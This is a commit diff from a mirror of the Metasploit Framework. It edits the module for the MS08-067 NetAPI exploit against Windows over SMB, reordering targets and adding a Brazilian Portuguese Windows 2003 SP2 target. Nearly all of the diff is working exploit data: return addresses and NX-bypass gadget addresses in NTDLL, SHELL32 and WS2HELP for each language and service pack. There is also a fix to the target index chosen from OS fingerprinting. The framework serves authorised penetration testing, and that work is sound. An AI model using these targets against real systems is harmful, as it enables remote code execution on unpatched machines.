infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add Portuguese target, lands #3961 (also reorders targets)

bug/bundler_fix
HD Moore 2014-12-12 14:23:02 -06:00
parent 183acb9582
commit 50b734f996
1 changed files with 93 additions and 79 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

172
modules/exploits/windows/smb/ms08_067_netapi.rb
View File

@ -88,6 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote
}
], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass
['Windows 2003 SP0 Universal',
{
'Ret' => 0x0100129e,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
#
# ENGLISH TARGETS
#
@ -128,79 +136,6 @@ class Metasploit3 < Msf::Exploit::Remote
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass
['Windows 2003 SP0 Universal',
{
'Ret' => 0x0100129e,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 English (NO NX)',
{
'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
['Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 Japanese (NO NX)',
{
'Ret' => 0x71a921a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 German (NO NX)',
{
'Ret' => 0x71a03969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 German (NX)',
{
'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
#
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
#
@ -637,12 +572,34 @@ class Metasploit3 < Msf::Exploit::Remote
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Windows 2003 Targets
#
# Standard return-to-ESI without NX bypass
# Provided by Masashi Fujiwara
['Windows 2003 SP2 Japanese (NO NX)',
['Windows 2003 SP1 English (NO NX)',
{
'Ret' => 0x71a91ed2,
'Scratch' => 0x00020408
'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
['Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 Japanese (NO NX)',
{
'Ret' => 0x71a921a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
@ -665,6 +622,54 @@ class Metasploit3 < Msf::Exploit::Remote
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 German (NO NX)',
{
'Ret' => 0x71a03969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 German (NX)',
{
'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
[ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 Spanish (NO NX)',
{
@ -682,7 +687,16 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
]
],
# Standard return-to-ESI without NX bypass
# Provided by Masashi Fujiwara
['Windows 2003 SP2 Japanese (NO NX)',
{
'Ret' => 0x71a91ed2,
'Scratch' => 0x00020408
}
], # JMP ESI WS2HELP.DLL
#
# Missing Targets
@ -826,7 +840,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Windows 2003 SP0 is mostly universal
if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack'
mytarget = targets[7]
mytarget = targets[3]
end
# Windows 2003 R2 is treated the same as 2003